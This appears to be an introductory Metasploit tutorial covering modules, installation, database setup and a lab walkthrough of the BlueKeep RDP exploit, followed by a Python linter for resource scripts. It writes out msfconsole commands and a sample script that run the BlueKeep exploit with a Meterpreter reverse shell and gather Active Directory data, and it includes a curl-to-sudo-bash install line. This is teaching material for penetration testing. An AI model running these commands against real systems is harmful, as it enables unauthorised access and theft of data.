Metasploit Framework is a powerful platform for penetration testing that allows security professionals to explore vulnerabilities, utilize exploits, manage sessions on target systems and conduct comprehensive training experiments in a lab environment. Metasploit emerged in the early 2000s and quickly gained popularity. Initially, it was a tool for testing specific exploits, but over time, it evolved into a universal platform with a vast library of modules, built-in payloads and tools for managing test results.
Key Features of Metasploit
Metasploit offers several key functions that enhance the efficiency of penetration testers:
- Scanning: Quickly identifies open ports, service versions and potential entry points.
- Exploits: Ready-made attack scripts for known vulnerabilities.
- Payloads: Programs executed on the target machine after a successful exploit.
- Session Management: Control over the target system for access rights analysis and security testing.
Metasploit helps structure the penetration testing process and provides a systematic understanding of how vulnerabilities work and what attack scenarios are possible.
Main Components of Metasploit: Modules and Payloads
Metasploit is built around a modular system, making it flexible and convenient for various penetration testing tasks. Each module serves a specific purpose and understanding these components is the first step toward confidently using the framework.
| Module Type | Purpose | When to Use |
|---|---|---|
| Exploit | Uses a specific vulnerability of the target system to gain access. | When a vulnerability is known and an attack demonstration is needed. |
| Auxiliary | Support modules for scanning, information gathering and vulnerability checking. | During reconnaissance and system analysis, before applying exploits. |
| Post | Modules for post-exploitation tasks: information gathering, privilege checking and cleaning traces. | After gaining access to explore the system and assess attack consequences. |
| Payload | Payloads that run on the target machine after an exploit (from commands to Meterpreter). | Depending on the goal: basic payload for testing, Meterpreter for full control. |
For beginners, it's advisable to start with small lab experiments. For instance, scanning a virtual test machine using an auxiliary module can help identify open services and potential weaknesses. After that, attempting an exploit on a vulnerable system, launching a basic payload and confirming the connection to the target can be a next step.
Installing Metasploit
Metasploit can be installed on almost any modern system and the process is simpler than it may seem.
Following the instructions carefully and setting up a safe, isolated experimental environment is crucial, especially for newcomers.
Installation Steps
- On Kali Linux:
- On Linux (Ubuntu/Debian): Install dependencies:
Code:
sudo apt update
sudo apt install curl git ruby-full build-essential libsqlite3-dev
Download and run the official installer script (since it is piped straight into sudo bash, save and read it first if you want to see what it does):
Code:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate.sh | sudo bash
Verify the console launch with msfconsole.
- On Windows:
Setting Up the Environment
After installation, it's important to configure the working environment for comfort and safety:
- Update the exploit database: Always update the framework before starting with msfupdate.
- Configure PATH and aliases: On Linux, adding msfconsole to PATH or creating an alias for quick launch is convenient.
- Use virtual labs: Setting up a test environment in VirtualBox or VMware allows safe experimentation with exploits and payloads.
Configuring PostgreSQL Database for Metasploit
Metasploit works with numerous modules, exploits and sessions, making a database essential for effective testing. PostgreSQL is the standard solution for the framework, providing stable information storage. The database in Metasploit is not just a luxury - it's necessary for convenient operation. PostgreSQL is used for storing scan results, host lists, sessions and history. However, it may be turned off by default. A quick solution is:
Code:
sudo systemctl start postgresql
msfdb init
After this, Metasploit will work with the database, and you can find modules with the search command instead of browsing the module tree manually.
Practical Examples of Using Metasploit
After setting up and configuring your environment, it's time to see Metasploit in action. It's best to start with a safe lab environment, such as a virtual machine like Metasploitable, where you can experiment with exploits and payloads without risk.
Example Scenario: Exploiting the BlueKeep Vulnerability
Here’s a step-by-step breakdown of how to use Metasploit to exploit the BlueKeep vulnerability:
- Identify Vulnerable Hosts: Use the auxiliary module to scan for vulnerable hosts. For BlueKeep, you can use:
Code:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
- Generate and Launch the Exploit: Once you identify a vulnerable host, generate a specific payload using the exploit module:
Code:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp
- Establish a Remote Session: After setting the payload, run the exploit to establish a remote session with Meterpreter.
- Gather Information: Use various post-exploitation modules to collect information. For example, to gather data from Active Directory, you can use:
Code:
use post/windows/gather/ad_to_sqlite
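The module table above and the step list in this scenario describe one workflow: auxiliary modules for reconnaissance, then an exploit with a payload, then post modules against the resulting session. In a lab these steps are usually written down as an msfconsole resource script (.rc) and replayed with msfconsole -r. The following is an added example, not Metasploit's own code: a small linter that parses such a script, splits each module path into its type, group and name, and checks the script against the workflow from the table (no module type used before an earlier phase, RHOSTS set before an auxiliary or exploit module runs, SESSION set before a post module runs, payload only set on an exploit). The ordering rule and the option checks are this example's own conventions, and the two sample scripts and their lab addresses are constructed.

```python
"""Lint a Metasploit resource script against the module workflow described above.

Added example (not Metasploit code). The checks below are this example's own
conventions; the sample scripts and addresses are constructed for the demo.
"""

MODULE_TYPES = {"auxiliary", "exploit", "post", "payload"}

# Expected order in a lab run: reconnaissance, then exploitation, then post.
PHASE = {"auxiliary": 0, "exploit": 1, "post": 2}


def parse_module_path(path):
    """Split 'exploit/windows/rdp/cve_2019_0708_bluekeep_rce' into type/group/name."""
    parts = path.strip().split("/")
    if len(parts) < 2 or parts[0] not in MODULE_TYPES:
        raise ValueError(f"not a module path: {path!r}")
    return {"type": parts[0], "group": "/".join(parts[1:-1]), "name": parts[-1]}


def lint_resource_script(text):
    """Return a list of (line_number, message) findings for a resource script."""
    findings = []
    current = None      # parsed module selected by the last 'use'
    options = {}        # options 'set' on the current module
    last_phase = -1     # highest phase seen so far, for the ordering rule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # blank line or comment
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.lower()
        if cmd == "use":
            try:
                current = parse_module_path(arg)
            except ValueError as err:
                findings.append((lineno, str(err)))
                current = None
                continue
            options = {}
            phase = PHASE.get(current["type"], -1)
            if phase < last_phase:
                findings.append((lineno, f"{current['type']} module used after a later-phase module"))
            last_phase = max(last_phase, phase)
        elif cmd == "set":
            key, _, value = arg.partition(" ")
            key = key.upper()
            if current is None:
                findings.append((lineno, "set before any use"))
                continue
            if key == "PAYLOAD" and current["type"] != "exploit":
                findings.append((lineno, "payload set on a non-exploit module"))
            options[key] = value
        elif cmd in ("run", "exploit", "check"):
            if current is None:
                findings.append((lineno, f"{cmd} before any use"))
            elif current["type"] in ("auxiliary", "exploit") and "RHOSTS" not in options:
                findings.append((lineno, f"RHOSTS not set before {cmd}"))
            elif current["type"] == "post" and "SESSION" not in options:
                findings.append((lineno, f"SESSION not set before {cmd}"))
    return findings


# Constructed sample: the scenario above as a resource script (lab addresses made up).
GOOD_SCRIPT = """\
# scan, exploit, then gather: the order from the module table
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 10.0.2.15
run
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 10.0.2.15
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.4
exploit
use post/windows/gather/ad_to_sqlite
set SESSION 1
run
"""

# Constructed sample with two mistakes: post module run without a session,
# and an exploit selected after the post phase has already started.
BAD_SCRIPT = """\
use post/windows/gather/ad_to_sqlite
run
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp
"""

if __name__ == "__main__":
    for name, script in (("good", GOOD_SCRIPT), ("bad", BAD_SCRIPT)):
        for lineno, msg in lint_resource_script(script) or [(0, "no findings")]:
            print(f"{name}:{lineno}: {msg}")
```

The linter deliberately knows nothing about individual modules; it only encodes the phase order and the two options every scanner, exploit and post module needs, which is enough to catch the usual beginner mistakes (running a post module with no SESSION, forgetting RHOSTS) before a script is replayed against a lab machine.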
